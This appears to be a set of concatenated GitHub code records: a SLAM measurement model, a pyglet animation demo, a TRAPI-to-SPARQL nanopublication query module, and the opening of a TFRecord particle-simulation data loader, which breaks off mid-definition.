From this group of landmarks, detections\n are sampled using the absolute values of random samples from a zero mean, sensing_range_deviation normal\n distribution as distance threshold.\n \"\"\"\n\n measurements = []\n correspondences = []\n\n for ground_truth_state in ground_truth_states:\n landmark_distance_index_list = get_landmarks_in_range(ground_truth_state, landmarks,\n max_sensing_range)\n\n # Sample obstacles from the in-range ones, using the absolute values of samples from a zero-mean normal\n # distribution as distance thresholds\n landmark_distance_index_list = [landmark_distance_index for landmark_distance_index in\n landmark_distance_index_list if\n abs(rnd.normalvariate(0, sensing_range_deviation))\n >= landmark_distance_index.distance]\n\n measurements_for_state = [\n calculate_measurement_vector_for_detection(ground_truth_state, landmark_distance_index) for\n landmark_distance_index in landmark_distance_index_list]\n correspondences_for_state = [landmark_distance_index.index for landmark_distance_index in\n landmark_distance_index_list]\n\n add_noise_to_measurements_for_state(measurements_for_state, distance_deviation, heading_deviation)\n\n assert len(measurements_for_state) == len(correspondences_for_state)\n\n measurements.append(measurements_for_state)\n correspondences.append(correspondences_for_state)\n\n compress_correspondences(correspondences)\n\n assert len(measurements) == len(correspondences)\n for index, correspondence_for_state in enumerate(correspondences):\n assert len(measurements[index]) == len(correspondence_for_state)\n\n return measurements, correspondences\n","repo_name":"Bazs/graph_slam","sub_path":"utils/measurement_model.py","file_name":"measurement_model.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"44290468304","text":"import pyglet\n\n# Global variables\nwindow = pyglet.window.Window(800, 600)\npyglet.gl.glClearColor(0,128,255,255)\nlabel = pyglet.text.Label(\"0\", font_size=36, y=300, x=400)\nraven_list = []\nfor i in range(25):\n strg = 'images/raven' + str(i + 1) + '.png'\n raven_list.append(pyglet.image.load(strg))\n# animation = pyglet.image.from_image_sequence(raven_list, 0.2, True)\nimage = pyglet.image.Animation.from_image_sequence(raven_list, 0.1, True)\nbatch = pyglet.graphics.Batch()\nsprite = pyglet.sprite.Sprite(img=image, batch=batch)\nsprite.scale = 0.5\n# Event callbacks\n@window.event\ndef on_draw():\n window.clear()\n label.draw()\n batch.draw()\n\n# Game loop (loop? 
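# --- Editor's note (illustrative, not part of the original script) ---\n# pyglet.clock.schedule(game_loop) below fires the callback once per frame;\n# for a fixed tick rate pyglet also provides schedule_interval, e.g.:\n#   pyglet.clock.schedule_interval(game_loop, 1 / 60.0)  # ~60 updates/sec\n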
Why loop?)\ndef game_loop(_):\n label.text = str(int(label.text) + 1)\n\npyglet.clock.schedule(game_loop)\npyglet.app.run()\n","repo_name":"kientuongnguyen/game","sub_path":"game/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1841407499","text":"import json\nimport urllib.request\n\nimport requests\nfrom app.config import settings\nfrom SPARQLWrapper import JSON, SPARQLWrapper\n\nKNOWLEDGE_PROVIDER = \"https://w3id.org/biolink/infores/knowledge-collaboratory\"\n\nget_nanopubs_select_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nPREFIX npa: \nSELECT DISTINCT ?association ?subject ?predicate ?object ?subject_category ?object_category\n ?primary_knowledge_source ?provided_by ?publications\n ?label ?description ?population_has_phenotype ?has_population_context\nWHERE {\n graph ?np_assertion {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate ;\n rdf:object ?object .\n OPTIONAL {\n ?association biolink:primary_knowledge_source ?primary_knowledge_source .\n }\n OPTIONAL {\n ?association biolink:provided_by ?provided_by .\n }\n OPTIONAL {\n ?association biolink:publications ?publications .\n }\n OPTIONAL {\n ?association rdfs:label ?label .\n }\n OPTIONAL {\n ?association biolink:description ?description .\n }\n OPTIONAL {\n ?association biolink:has_population_context|biolink:population_context_qualifier [\n rdfs:label ?has_population_context ;\n biolink:has_phenotype ?population_has_phenotype ;\n ] .\n }\n {\n ?subject a ?subject_category .\n ?object a ?object_category .\n } UNION {\n ?subject biolink:category ?subject_category .\n ?object biolink:category ?object_category .\n }\n }\n ?_entity_filters\n ?_prov_block\n ?_np_index_filter\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion ;\n np:hasProvenance ?np_prov .\n }\n graph npa:graph {\n ?np_uri npa:hasValidSignatureForPublicKey ?pubkey .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\"\"\"\n)\n\nget_metakg_edges_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nSELECT DISTINCT ?subject_category ?predicate_category ?object_category\nWHERE {\n graph ?np_assertion {\n ?subject biolink:category ?subject_category .\n ?object biolink:category ?object_category .\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate_category ;\n rdf:object ?object .\n FILTER (datatype(?subject_category) = xsd:string)\n FILTER (datatype(?object_category) = xsd:string)\n #{\n # ?subject a ?subject_category .\n # ?object a ?object_category .\n #} UNION {\n # ?subject biolink:category ?subject_category .\n # ?object biolink:category ?object_category .\n #}\n }\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\"\"\"\n)\n\nget_metakg_prefixes_query = (\n \"\"\"PREFIX rdf: \nPREFIX rdfs: \nPREFIX biolink: \nPREFIX np: \nPREFIX npx: \nSELECT DISTINCT ?node_category ?node_prefix\nWHERE {\n graph ?np_assertion {\n {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?node ;\n rdf:predicate ?predicate_category ;\n rdf:object ?object .\n } UNION {\n ?association\n biolink:aggregator_knowledge_source <\"\"\"\n + 
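# --- Editor's note (illustrative, not part of the original module) ---\n# This query is assembled by concatenating around KNOWLEDGE_PROVIDER, and the\n# pseudo-variables ?_entity_filters, ?_prov_block and ?_np_index_filter are\n# plain-text placeholders that reasonerapi_to_sparql() later substitutes via\n# str.replace(), e.g.:\n#   q = get_nanopubs_select_query.replace('?_entity_filters', 'FILTER ( ... )')\n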
KNOWLEDGE_PROVIDER\n + \"\"\"> ;\n rdf:subject ?subject ;\n rdf:predicate ?predicate_category ;\n rdf:object ?node .\n }\n ?node biolink:category ?node_category .\n FILTER (datatype(?node_category) = xsd:string)\n\n VALUES (?namespace ?separator) {\n (\"//identifiers.org/\" \"/\")\n (\"//purl.obolibrary.org/obo/\" \"_\")\n (\"//www.ebi.ac.uk/efo/\" \"_\")\n }\n BIND(UCASE(STRBEFORE(REPLACE(STRAFTER(str(?node), \":\"), ?namespace, \"\"), ?separator)) AS ?node_prefix)\n FILTER(strlen(?node_prefix)>0)\n FILTER(!strstarts(?node_prefix, \"//\"))\n }\n graph ?np_head {\n ?np_uri np:hasAssertion ?np_assertion .\n }\n FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n}\n\"\"\"\n)\n\n# Load BioLink JSON-LD Context to resolve URIs to BioLink CURIEs\nwith urllib.request.urlopen(\n f\"https://raw.githubusercontent.com/biolink/biolink-model/v{settings.BIOLINK_VERSION}/context.jsonld\"\n) as url:\n data = json.loads(url.read().decode())\n\n\nnamespace_resolver = {}\ncontext = data[\"@context\"]\nfor prefix in context:\n if isinstance(context[prefix], str):\n namespace_resolver[prefix] = context[prefix]\n elif \"@id\" in context[prefix]:\n namespace_resolver[prefix] = context[prefix][\"@id\"]\n\nuri_resolver = {v: k for k, v in namespace_resolver.items()}\nuri_resolver[\"https://identifiers.org/mim/\"] = \"OMIM\"\nuri_resolver[\"https://identifiers.org/OMIM:\"] = \"OMIM\"\nuri_resolver[\"https://identifiers.org/drugbank/\"] = \"DRUGBANK\"\nuri_resolver[\"https://go.drugbank.com/drugs/\"] = \"DRUGBANK\"\nuri_resolver[\"https://w3id.org/biolink/vocab/\"] = \"biolink\"\nuri_resolver[\"http://w3id.org/biolink/vocab/\"] = \"biolink\"\nuri_resolver[\"https://w3id.org/um/neurodkg/\"] = \"neurodkg\"\n# http://www.ebi.ac.uk/efo/EFO_000985\n\n\ndef resolve_uri_with_context(uri_string):\n \"\"\"Take an URI and return its CURIE form, using the BioLink JSON-LD Context previously loaded\"\"\"\n for ns_uri in uri_resolver:\n if uri_string.startswith(\"http://purl.obolibrary.org/obo/\"):\n # Handle OBO URIs\n return uri_string.replace(\"http://purl.obolibrary.org/obo/\", \"\").replace(\n \"_\", \":\"\n )\n elif uri_string.startswith(ns_uri):\n return uri_string.replace(ns_uri, uri_resolver[ns_uri] + \":\")\n elif uri_string.startswith(\"https://identifiers.org/\"):\n # To handle URIs generated by Nanobench templates\n return uri_string.replace(\"https://identifiers.org/\", \"\")\n # If not found:\n return uri_string\n\n\ndef resolve_curie(curie_string):\n \"\"\"Take a CURIE and return the corresponding URI in the Nanopublication network\n using the BioLink JSON-LD Context previously loaded\n \"\"\"\n # Quick fix to handle lowercase drugbank and omim\n # if curie_string.startswith('drugbank:'):\n # curie_string = curie_string.replace('drugbank:', 'DRUGBANK:')\n # if curie_string.startswith('omim:'):\n # curie_string = curie_string.replace('omim:', 'OMIM:')\n\n ns = curie_string.split(\":\")[0]\n id = curie_string.split(\":\")[1]\n if ns in namespace_resolver:\n return namespace_resolver[ns] + id\n else:\n return \"http://identifiers.org/\" + curie_string\n\n\ndef resolve_curie_identifiersorg(curie_string):\n \"\"\"Take a CURIE and return the corresponding URI in the Nanopublication network\"\"\"\n # Quick fix to handle lowercase drugbank and omim\n if curie_string.startswith(\"drugbank:\"):\n curie_string = curie_string.replace(\"drugbank:\", \"DRUGBANK:\")\n if curie_string.startswith(\"omim:\"):\n curie_string = curie_string.replace(\"omim:\", \"OMIM:\")\n return \"https://identifiers.org/\" + curie_string\n\n\ndef 
get_predicates_from_nanopubs():\n \"\"\"Query the Nanopublications network to get BioLink entity categories and the relation between them\n Formatted for the Translator TRAPI /predicate get call\n \"\"\"\n # TODO: Update to the meta_knowledge_graph for TRAPI 3.1.0\n predicates = {}\n # Run query to get types and relations between them\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(get_metakg_edges_query)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n for result in sparql_results:\n np_subject = resolve_uri_with_context(result[\"subject_category\"][\"value\"])\n np_predicate = resolve_uri_with_context(result[\"predicate_category\"][\"value\"])\n np_object = resolve_uri_with_context(result[\"object_category\"][\"value\"])\n if not predicates.get(np_subject):\n predicates[np_subject] = {}\n\n if not predicates[np_subject].get(np_object):\n predicates[np_subject][np_object] = []\n if np_predicate not in predicates[np_subject][np_object]:\n predicates[np_subject][np_object].append(np_predicate)\n\n return predicates\n\n\ndef get_metakg_from_nanopubs():\n \"\"\"Query the Nanopublications network to get BioLink entity categories and the relation between them\n Formatted for the Translator TRAPI /predicate get call\n \"\"\"\n # TODO: Update to the meta_knowledge_graph for TRAPI 3.1.0\n # Run query to get types and relations between them\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(get_metakg_edges_query)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n # print(get_metakg_edges_query)\n # print(sparql_results)\n edges_array = []\n for result in sparql_results:\n edges_array.append(\n {\n \"subject\": resolve_uri_with_context(\n result[\"subject_category\"][\"value\"]\n ),\n \"predicate\": resolve_uri_with_context(\n result[\"predicate_category\"][\"value\"]\n ),\n \"object\": resolve_uri_with_context(result[\"object_category\"][\"value\"]),\n }\n )\n\n # print(get_metakg_prefixes_query)\n sparql.setQuery(get_metakg_prefixes_query)\n sparqlwrapper_results = sparql.query().convert()\n prefixes_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n nodes_obj = {}\n for result in prefixes_results:\n node_category = resolve_uri_with_context(result[\"node_category\"][\"value\"])\n if node_category not in nodes_obj.keys():\n nodes_obj[node_category] = {\"id_prefixes\": [result[\"node_prefix\"][\"value\"]]}\n else:\n nodes_obj[node_category][\"id_prefixes\"].append(\n result[\"node_prefix\"][\"value\"]\n )\n\n return {\"edges\": edges_array, \"nodes\": nodes_obj}\n\n\ndef get_np_users():\n pubkeys = {}\n headers = {\"Accept\": \"application/json\"}\n res = requests.get(\n f\"{settings.NANOPUB_GRLC_URL}/get_all_users\", headers=headers\n ).json()\n for user in res[\"results\"][\"bindings\"]:\n # print(user)\n # Remove bad ORCID URLs\n if not user[\"user\"][\"value\"].startswith(\"https://orcid.org/https://orcid.org/\"):\n if \"name\" not in user:\n user[\"name\"] = {\"value\": user[\"user\"][\"value\"]}\n\n pubkeys[user[\"pubkey\"][\"value\"]] = user\n # users_orcid[user['user']['value']] = user\n return pubkeys\n\n\ndef reasonerapi_to_sparql(reasoner_query):\n \"\"\"Convert an array of predictions objects to ReasonerAPI format\n Run the get_predict to get the QueryGraph edges and nodes\n {disease: OMIM:1567, drug: DRUGBANK:DB0001, score: 
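# --- Editor's note (illustrative, not part of the original module) ---\n# reasonerapi_to_sparql() (documented here) only accepts one-hop (single\n# edge) query graphs. A minimal TRAPI message of that shape, with\n# hypothetical CURIEs borrowed from the commented example at file end:\n#   {\"message\": {\"query_graph\": {\n#       \"nodes\": {\"n0\": {\"ids\": [\"DRUGBANK:DB00394\"]},\n#                 \"n1\": {\"categories\": [\"biolink:Disease\"]}},\n#       \"edges\": {\"e01\": {\"subject\": \"n0\", \"object\": \"n1\",\n#                         \"predicates\": [\"biolink:treats\"]}}}}}\n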
0.9}\n\n :param: reasoner_query Query from Reasoner API\n :return: Results as ReasonerAPI object\n \"\"\"\n np_users = get_np_users()\n # print(np_users)\n query_graph = reasoner_query[\"message\"][\"query_graph\"]\n query_options = {}\n n_results = None\n in_index = None\n if \"query_options\" in reasoner_query:\n query_options = reasoner_query[\"query_options\"]\n if \"n_results\" in query_options:\n n_results = int(query_options[\"n_results\"])\n if \"in_index\" in query_options:\n in_index = str(query_options[\"in_index\"])\n\n if len(query_graph[\"edges\"]) != 1:\n return {\n \"error\": len(query_graph[\"edges\"])\n + \"\"\" edges have been provided.\n This API currently only implements 1 hop queries (with 1 edge query_graph).\n Contact us if you are interested in running multiple hop queries\"\"\"\n }\n\n sparql_query_get_nanopubs = get_nanopubs_select_query\n predicate_edge_id = \"\"\n subject_node_id = \"\"\n object_node_id = \"\"\n prov_block = \"\"\n np_index_block = \"\"\n\n if in_index == \"infores:knowledge-collaboratory\":\n # TODO: filter just on nanopubs created via annotate tool, maybe use prov?\n # knowledge_source_block = f\"biolink:primary_knowledge_source <{KNOWLEDGE_PROVIDER}> ;\"\n prov_block = \"\"\"graph ?np_prov {\n ?np_assertion prov:wasQuotedFrom ?wasQuotedFrom .\n }\"\"\"\n elif in_index:\n np_index_block = f\"\"\"graph ?indexAssertionGraph {{\n {{\n <{in_index}> npx:appendsIndex* ?index .\n ?index npx:includesElement ?np .\n }} UNION {{\n <{in_index}> npx:includesElement ?np .\n }}\n }}\"\"\"\n\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_np_index_filter\", np_index_block\n )\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_prov_block\", prov_block\n )\n # else:\n # knowledge_source_block = f\"biolink:aggregator_knowledge_source <{KNOWLEDGE_PROVIDER}> ;\"\n # sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace('?_knowledge_source', knowledge_source_block)\n\n for edge_id in query_graph[\"edges\"]:\n edge_props = query_graph[\"edges\"][edge_id]\n predicate_edge_id = edge_id\n subject_node_id = edge_props[\"subject\"]\n object_node_id = edge_props[\"object\"]\n\n entity_filters = \"\"\n try:\n predicate_curies = edge_props[\"predicates\"]\n if not isinstance(predicate_curies, list):\n predicate_curies = [predicate_curies]\n predicate_curies = [\"?predicate = \" + curie for curie in predicate_curies]\n predicate_curies = \" || \".join(\"?predicate = \" + predicate_curies)\n entity_filters = entity_filters + \"FILTER ( \" + predicate_curies + \" )\\n\"\n except Exception:\n pass\n\n try:\n subject_categories = query_graph[\"nodes\"][edge_props[\"subject\"]][\n \"categories\"\n ]\n if not isinstance(subject_categories, list):\n subject_categories = [subject_categories]\n subject_categories = [\"?subject_category = \" + curie for curie in subject_categories]\n subject_categories = \" || \".join(subject_categories)\n entity_filters = entity_filters + \"FILTER ( \" + subject_categories + \" )\\n\"\n except Exception:\n pass\n\n try:\n object_categories = query_graph[\"nodes\"][edge_props[\"object\"]][\"categories\"]\n if not isinstance(object_categories, list):\n object_categories = [object_categories]\n object_categories = [\"?object_category = \" + curie for curie in object_categories]\n object_categories = \" || \".join(object_categories)\n entity_filters = entity_filters + \"FILTER ( \" + object_categories + \" )\\n\"\n except Exception:\n pass\n\n # Resolve provided CURIE to the BioLink context and 
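# --- Editor's note (illustrative, not part of the original module) ---\n# resolve_curie() defined earlier maps a CURIE back to a URI through the\n# BioLink JSON-LD context, falling back to identifiers.org for unknown\n# prefixes; assuming the standard BioLink context, for example:\n#   resolve_curie('biolink:treats')  # -> https://w3id.org/biolink/vocab/treats\n#   resolve_curie('FOO:123')         # -> http://identifiers.org/FOO:123\n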
https://identifiers.org/CURIE:ID\n try:\n subject_curies = query_graph[\"nodes\"][edge_props[\"subject\"]][\"ids\"]\n subject_curies = [f\"?subject = <{resolve_curie(curie)}> || ?subject =<{resolve_curie_identifiersorg(curie)}>\" for curie in subject_curies]\n subject_curies = \" || \".join(subject_curies)\n entity_filters = entity_filters + \"FILTER ( \" + subject_curies + \" )\\n\"\n except Exception:\n pass\n\n try:\n object_curies = query_graph[\"nodes\"][edge_props[\"object\"]][\"ids\"]\n object_curies = [f\"?object = <{resolve_curie(curie)}> || ?object =<{resolve_curie_identifiersorg(curie)}>\" for curie in object_curies]\n object_curies = \" || \".join(object_curies)\n entity_filters = entity_filters + \"FILTER ( \" + object_curies + \" )\\n\"\n except Exception:\n pass\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_entity_filters\", entity_filters\n )\n sparql_query_get_nanopubs = sparql_query_get_nanopubs.replace(\n \"?_prov_block\", prov_block\n )\n\n # Add LIMIT to the SPARQL query if n_results provided\n if n_results:\n sparql_query_get_nanopubs = (\n sparql_query_get_nanopubs + \" LIMIT \" + str(n_results)\n )\n\n knowledge_graph = {\"nodes\": {}, \"edges\": {}}\n query_results = []\n kg_edge_count = 0\n\n if settings.DEV_MODE is True:\n print(\n f\"Running the following SPARQL query to retrieve nanopublications from {settings.NANOPUB_SPARQL_URL}\"\n )\n print(sparql_query_get_nanopubs)\n\n sparql = SPARQLWrapper(settings.NANOPUB_SPARQL_URL)\n sparql.setReturnFormat(JSON)\n sparql.setQuery(sparql_query_get_nanopubs)\n sparqlwrapper_results = sparql.query().convert()\n sparql_results = sparqlwrapper_results[\"results\"][\"bindings\"]\n\n # Check current official example of Reasoner query results: https://github.com/NCATSTranslator/ReasonerAPI/blob/master/examples/Message/simple.json\n # Now iterates the Nanopubs SPARQL query results:\n for edge_result in sparql_results:\n # print(edge_result)\n edge_uri = edge_result[\"association\"][\"value\"]\n # Create edge object in knowledge_graph\n knowledge_graph[\"edges\"][edge_uri] = {\n \"predicate\": resolve_uri_with_context(edge_result[\"predicate\"][\"value\"]),\n \"subject\": resolve_uri_with_context(edge_result[\"subject\"][\"value\"]),\n \"object\": resolve_uri_with_context(edge_result[\"object\"][\"value\"]),\n \"attributes\": [],\n \"sources\": [\n {\n \"resource_id\": \"infores:knowledge-collaboratory\",\n \"resource_role\": \"primary_knowledge_source\"\n },\n ]\n }\n if (\n \"pubkey\" in edge_result\n and \"user\" in np_users[edge_result[\"pubkey\"][\"value\"]]\n ):\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:author\",\n \"value\": np_users[edge_result[\"pubkey\"][\"value\"]][\"user\"][\"value\"],\n }\n )\n\n # TODO: refactor to use a list and a loop\n # extract_attributes = [\n # 'relation', 'publications', 'knowledge_source', 'label', 'provided_by',\n # 'description', 'has_population_context', 'population_has_phenotype'\n # ]\n # if \"relation\" in edge_result:\n # # knowledge_graph['edges'][edge_uri]['relation'] = resolve_uri_with_context(edge_result['relation']['value'])\n # knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n # {\n # \"attribute_type_id\": \"biolink:relation\",\n # \"value\": resolve_uri_with_context(edge_result[\"relation\"][\"value\"]),\n # }\n # )\n if \"publications\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:publications\",\n 
\"value\": resolve_uri_with_context(\n edge_result[\"publications\"][\"value\"]\n ),\n }\n )\n # NOTE: not used anymore, primary is always the knowledge collaboratory\n # if \"primary_knowledge_source\" in edge_result:\n # knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n # {\n # \"attribute_type_id\": \"biolink:primary_knowledge_source\",\n # \"value\": resolve_uri_with_context(\n # edge_result[\"primary_knowledge_source\"][\"value\"]\n # ),\n # }\n # )\n\n if \"label\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:name\",\n \"value\": resolve_uri_with_context(edge_result[\"label\"][\"value\"]),\n }\n )\n if \"description\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:description\",\n \"value\": resolve_uri_with_context(\n edge_result[\"description\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Cohort',\n }\n )\n\n if \"has_population_context\" in edge_result:\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:population_context_qualifier\",\n \"value\": resolve_uri_with_context(\n edge_result[\"has_population_context\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Cohort',\n }\n )\n\n if \"population_has_phenotype\" in edge_result:\n # TODO: fix the key\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:has_phenotype\",\n \"value\": resolve_uri_with_context(\n edge_result[\"population_has_phenotype\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Phenotype',\n }\n )\n\n # if edge_result['association_type']:\n # knowledge_graph['edges'][edge_uri]['association_type'] = resolve_uri_with_context(edge_result['association_type']['value'])\n\n if \"provided_by\" in edge_result:\n # Add provided_by attribute\n knowledge_graph[\"edges\"][edge_uri][\"attributes\"].append(\n {\n \"attribute_type_id\": \"biolink:provided_by\",\n \"value\": resolve_uri_with_context(\n edge_result[\"provided_by\"][\"value\"]\n ),\n # 'value_type_id': 'biolink:Agent',\n }\n )\n\n knowledge_graph[\"nodes\"][\n resolve_uri_with_context(edge_result[\"subject\"][\"value\"])\n ] = {\n \"categories\": [\n resolve_uri_with_context(edge_result[\"subject_category\"][\"value\"])\n ]\n }\n knowledge_graph[\"nodes\"][\n resolve_uri_with_context(edge_result[\"object\"][\"value\"])\n ] = {\n \"categories\": [\n resolve_uri_with_context(edge_result[\"object_category\"][\"value\"])\n ]\n }\n\n # Add the bindings to the results object\n result = {\n 'node_bindings': {},\n 'analyses': [{\n \"resource_id\": \"infores:knowledge-collaboratory\",\n \"edge_bindings\": {\n predicate_edge_id: [\n {\n \"id\": edge_uri\n }\n ]\n }\n }],\n # 'edge_bindings': {},\n }\n # result[\"edge_bindings\"][predicate_edge_id] = [{\"id\": edge_uri}]\n result[\"node_bindings\"][subject_node_id] = [\n {\"id\": resolve_uri_with_context(edge_result[\"subject\"][\"value\"])}\n ]\n result[\"node_bindings\"][object_node_id] = [\n {\"id\": resolve_uri_with_context(edge_result[\"object\"][\"value\"])}\n ]\n query_results.append(result)\n\n kg_edge_count += 1\n\n return {\n \"message\": {\n \"knowledge_graph\": knowledge_graph,\n \"query_graph\": query_graph,\n \"results\": query_results,\n },\n \"query_options\": query_options,\n \"reasoner_id\": \"infores:knowledge-collaboratory\",\n \"schema_version\": settings.TRAPI_VERSION,\n \"biolink_version\": settings.BIOLINK_VERSION,\n \"status\": \"Success\",\n # 
\"tool_version\": \"OpenPredict 0.1.0\",\n # \"logs\": [\n # {\n # \"code\": None,\n # \"level\": \"INFO\",\n # \"message\": \"No descendants found from Ontology KP for QNode 'n00'.\",\n # \"timestamp\": \"2023-04-05T07:24:26.646711\"\n # },\n # ]\n }\n\n\n# array_json = {\n# \"message\": {\n# \"query_graph\": {\n# \"edges\": {\n# \"e01\": {\n# \"object\": \"n1\",\n# \"predicate\": [\"biolink:treated_by\", \"biolink:treats\"],\n# \"subject\": \"n0\",\n# }\n# },\n# \"nodes\": {\n# \"n0\": {\n# \"category\": [\"biolink:ChemicalEntity\", \"biolink:Drug\"],\n# \"id\": [\"CHEBI:75725\", \"DRUGBANK:DB00394\"],\n# },\n# \"n1\": {\"category\": [\"biolink:Drug\", \"biolink:Disease\"]},\n# },\n# }\n# }\n# }\n\n## Get for rdf:type and biolink:category\n# get_metakg_edges_query = \"\"\"PREFIX rdf: \n# PREFIX rdfs: \n# PREFIX biolink: \n# PREFIX np: \n# PREFIX npx: \n# SELECT DISTINCT ?subject_category ?predicate_category ?object_category\n# WHERE {\n# graph ?np_assertion {\n# ?association\n# rdf:subject ?subject ;\n# rdf:predicate ?predicate_category ;\n# rdf:object ?object .\n# {\n# ?subject a ?subject_category .\n# ?object a ?object_category .\n# } UNION {\n# ?subject biolink:category ?subject_category .\n# ?object biolink:category ?object_category .\n# }\n# }\n# graph ?np_head {\n# ?np_uri np:hasAssertion ?np_assertion .\n# }\n# FILTER NOT EXISTS { ?creator npx:retracts ?np_uri }\n# }\"\"\"\n","repo_name":"MaastrichtU-IDS/knowledge-collaboratory","sub_path":"backend/app/trapi/reasonerapi_parser.py","file_name":"reasonerapi_parser.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"1933470141","text":"import os\nimport json\nimport pickle\nimport argparse\nimport functools\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\n# Create a description of the features.\n_FEATURE_DESCRIPTION = {\n 'position': tf.io.VarLenFeature(tf.string),\n}\n\n_FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT = _FEATURE_DESCRIPTION.copy()\n_FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT['step_context'] = tf.io.VarLenFeature(\n tf.string)\n\n_FEATURE_DTYPES = {\n 'position': {\n 'in': np.float32,\n 'out': tf.float32\n },\n 'step_context': {\n 'in': np.float32,\n 'out': tf.float32\n }\n}\n\n_CONTEXT_FEATURES = {\n 'key': tf.io.FixedLenFeature([], tf.int64, default_value=0),\n 'particle_type': tf.io.VarLenFeature(tf.string)\n}\n\ndef arg_parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data-path', required=True, help='path to tf dataset', type=str)\n return parser.parse_args()\n\ndef convert_to_tensor(x, encoded_dtype):\n if len(x) == 1:\n out = np.frombuffer(x[0].numpy(), dtype=encoded_dtype)\n else:\n out = []\n for el in x:\n out.append(np.frombuffer(el.numpy(), dtype=encoded_dtype))\n out = tf.convert_to_tensor(np.array(out))\n return out\n\n\ndef parse_serialized_simulation_example(example_proto, metadata):\n \"\"\"Parses a serialized simulation tf.SequenceExample.\n\n Args:\n example_proto: A string encoding of the tf.SequenceExample proto.\n metadata: A dict of metadata for the dataset.\n\n Returns:\n context: A dict, with features that do not vary over the trajectory.\n parsed_features: A dict of tf.Tensors representing the parsed examples\n across time, where axis zero is the time axis.\n\n \"\"\"\n if 'context_mean' in metadata:\n feature_description = _FEATURE_DESCRIPTION_WITH_GLOBAL_CONTEXT\n else:\n feature_description = _FEATURE_DESCRIPTION\n context, parsed_features = 
tf.io.parse_single_sequence_example(\n      example_proto,\n      context_features=_CONTEXT_FEATURES,\n      sequence_features=feature_description)\n  for feature_key, item in parsed_features.items():\n    convert_fn = functools.partial(\n        convert_to_tensor, encoded_dtype=_FEATURE_DTYPES[feature_key]['in'])\n    parsed_features[feature_key] = tf.py_function(\n        convert_fn, inp=[item.values], Tout=_FEATURE_DTYPES[feature_key]['out'])\n\n  # There is an extra frame at the beginning so we can calculate pos change\n  # for all frames used in the paper.\n  position_shape = [metadata['sequence_length'] + 1, -1, metadata['dim']]\n\n  # Reshape positions to correct dim:\n  parsed_features['position'] = tf.reshape(parsed_features['position'],\n                                           position_shape)\n  # Set correct shapes of the remaining tensors.\n  sequence_length = metadata['sequence_length'] + 1\n  if 'context_mean' in metadata:\n    context_feat_len = len(metadata['context_mean'])\n    parsed_features['step_context'] = tf.reshape(\n        parsed_features['step_context'],\n        [sequence_length, context_feat_len])\n  # Decode particle type explicitly\n  context['particle_type'] = tf.py_function(\n      functools.partial(convert_fn, encoded_dtype=np.int64),\n      inp=[context['particle_type'].values],\n      Tout=[tf.int64])\n  context['particle_type'] = tf.reshape(context['particle_type'], [-1])\n  return context, parsed_features\n\ndef _read_metadata(data_path):\n  with open(os.path.join(data_path, 'metadata.json'), 'rt') as fp:\n    return json.loads(fp.read())\n\ndef input_fn(data_path, split):\n  # Loads the metadata of the dataset.\n  metadata = _read_metadata(data_path)\n  # Create a tf.data.Dataset from the TFRecord.\n  ds = tf.data.TFRecordDataset([os.path.join(data_path, f'{split}.tfrecord')])\n  ds = ds.map(functools.partial(\n      parse_serialized_simulation_example, metadata=metadata))\n  return ds\n\ndef 